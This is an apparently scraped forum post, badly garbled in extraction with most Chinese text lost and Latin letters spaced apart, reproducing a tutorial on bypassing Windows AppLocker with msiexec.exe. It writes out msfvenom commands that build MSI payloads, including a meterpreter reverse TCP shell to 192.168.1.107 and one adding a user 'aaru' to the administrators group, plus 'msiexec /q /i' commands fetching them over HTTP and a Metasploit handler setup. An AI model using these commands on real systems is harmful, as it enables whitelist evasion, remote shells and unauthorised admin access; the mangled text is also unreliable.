搜索

[28069] 2020-01-17_使用msiexec.exe绕过应用程序白名单(多种方法)

文档创建者:s7ckTeam
浏览次数:83
最后更新:2025-01-19
2020-01-17_使用msiexec.exe绕过应用程序白名单(多种方法) 使 m s i e x e c . e x e O t s   2 0 2 0 - 0 1 - 1 7 A p p l o c k e r 使 W i n d o w s   a p p l o c k e r   P o l i c y   c m d . e x e A p p l o c k e r 1 使 使 . m s i A p p l o c k e r C M D M S I C M D 使 M s f v e n o m   - 1 s t . m s i 使 M s f v e n o m   - 2 n d . m s i 使 M s f v e n o m   - 3 r d . m s i 2 使 使 使 M s f v e n o m   - 4 t h . m s i A p p l o c k e r W i n d o w s   a p p l o c k e r W i n d o w s   7 W i n d o w s   S e r v e r   2 0 0 8   r 2 使 a p p l o c k e r c m d . e x e P o w e r s h e l l d l l r u n d l l 3 2 . e x e r e g s r v . 3 2 r e g a s m
1 使 . m s i A p p l o c k e r C M D W i n d o w s   I n s t a l l e r     . m s i 使 使 M S I S h e l l M S I M i c r o s o f t W i n d o w s   I n s t a l l e r M S I W i n d o w s W i n d o w s   I n s t a l l e r . m s i W i n d o w s   I n s t a l l e r 使 M s i e x e c . e x e M i c r o s o f t M S I W i n d o w s   I n s t a l l e r 使 M s i e x e c . e x e W i n d o w s   I n s t a l l e r M s i e x e c . e x e 使 M s i . d l l . m s i . m s t W i n d o w s   I n s t a l l e r . m s i . m s i M s i e x e c . e x e M S I C M D 使 使 M s f v e n o m   - 1   s t . m s i K a l i M S I c m d . m s i W i n d o w s   /   e x e c 1 2 m s f v e n o m   - p   w i n d o w s / e x e c   C M D = c m d . e x e   - f   m s i   >   c m d . m s i p y t h o n   - m   S i m p l e H T T P S e r v e r   8 0 W i n d o w s c m d . m s i S h e l l 使 P y t h o n   H T T P
. m s i W i n d o w s   c m d . e x e a d m i n W i n d o w s 使 使 m s i e x e c . e x e m s i   m s i e x e c   /   q u i e t   /   i 1 m s i e x e c   / q u i e t   / i   C : U s e r s r a j D e s k t o p c m d . m s i 使 使 M s f v e n o m   - 2   n d       . m s i 使 c m d . m s i m s f v e n o m c m d . p n g M S I c m d . m s i c m d . p n g 使 p y t h o n c m d . p n g . m s i W i n d o w s   c m d . e x e W i n d o w s 使
m s i e x e c . m s i e x e   m s i e x e c   /   q   /   i 1 m s i e x e c   / q   / i   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 7 / c m d . p n g 使 使 M s f v e n o m   - 3   r d       . m s i W i n d o w s   /   e x e c 使 w i n d o w s   /   m e t e r p r e t e r   / r e v e r s e _ t c p m e t e r p r e t e r 1 m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   l h o s t = 1 9 2 . 1 6 8 . 1 . 1 0 7   l p o r t = 1 2 3 4   f   m s i   >   s h e l l . m s i W i n d o w s s h e l l . m s i S h e l l m u l t i   /   h a n d l e r 使 P y t h o n   H T T P s h e l l . m s i W i n d o w s   c m d . e x e a d m i n W i n d o w s 使 使 m s i e x e c . e x e . m s i   m s i e x e c   /   q   /   i
1 m s i e x e c   / q   / i   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 7 / s h e l l . m s i 使 m e t e r p r e t e r 1 2 3 4 5 6 m s f   >   u s e   e x p l o i t / m u l t i / h a n d l e r m s f   e x p l o i t ( h a n d l e r ) >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f   e x p l o i t ( h a n d l e r )   >   s e t   l h o s t   1 9 2 . 1 6 8 . 1 . 1 0 7 m s f   e x p l o i t ( h a n d l e r )   >   s e t   l p o r t   1 2 3 4 m s f   e x p l o i t ( h a n d l e r )   >   e x p l o i t   m e t e r p r e t e r   >   s h e l l 2 使 W i n d o w s   I n s t a l l e r     . m s i 使 使 M S I 使 使 c m d . e x e A d m i n i s t r a t o r s   G r o u p a a r u
a p p l o c k e r c m d . e x e 使 a a r u
使 使 M s f v e n o m   - 4 t h . m s i 使 w i n d o w s   /   e x e c M S I a d m i n . m s i M S I a a r u 1 m s f v e n o m   - p   w i n d o w s / e x e c   C M D = ' n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   a a r u   / a d d '   - f   m s i   >   a d m i n . m s i W i n d o w s a d m i n . m s i a a r u 使 P y t h o n   H T T P a d m i n . m s i W i n d o w s c m d . e x e a d m i n 使 使 m s i e x e c . e x e a d m i n . m s i   m s i e x e c   /   q   /   i 1 m s i e x e c   / q   / i   h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 7 / a d m i n . m s i a a r u
使 . m s i c m d . e x e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理